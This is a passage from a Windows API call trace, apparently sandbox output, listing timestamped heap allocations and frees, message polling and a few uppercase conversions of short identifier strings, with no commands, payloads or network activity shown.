wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0087.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0087.907] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ff8 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0087.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0087.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.908] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.908] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.908] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0087.909] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0087.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0087.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0087.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.911] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0087.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0087.911] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0087.912] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0087.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0087.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0087.912] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0087.912] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.912] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0087.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0087.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.912] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0087.913] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0087.913] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0087.913] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0087.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0087.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0087.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748f8 [0087.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0087.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0087.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0087.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.915] RtlAllocateHeap 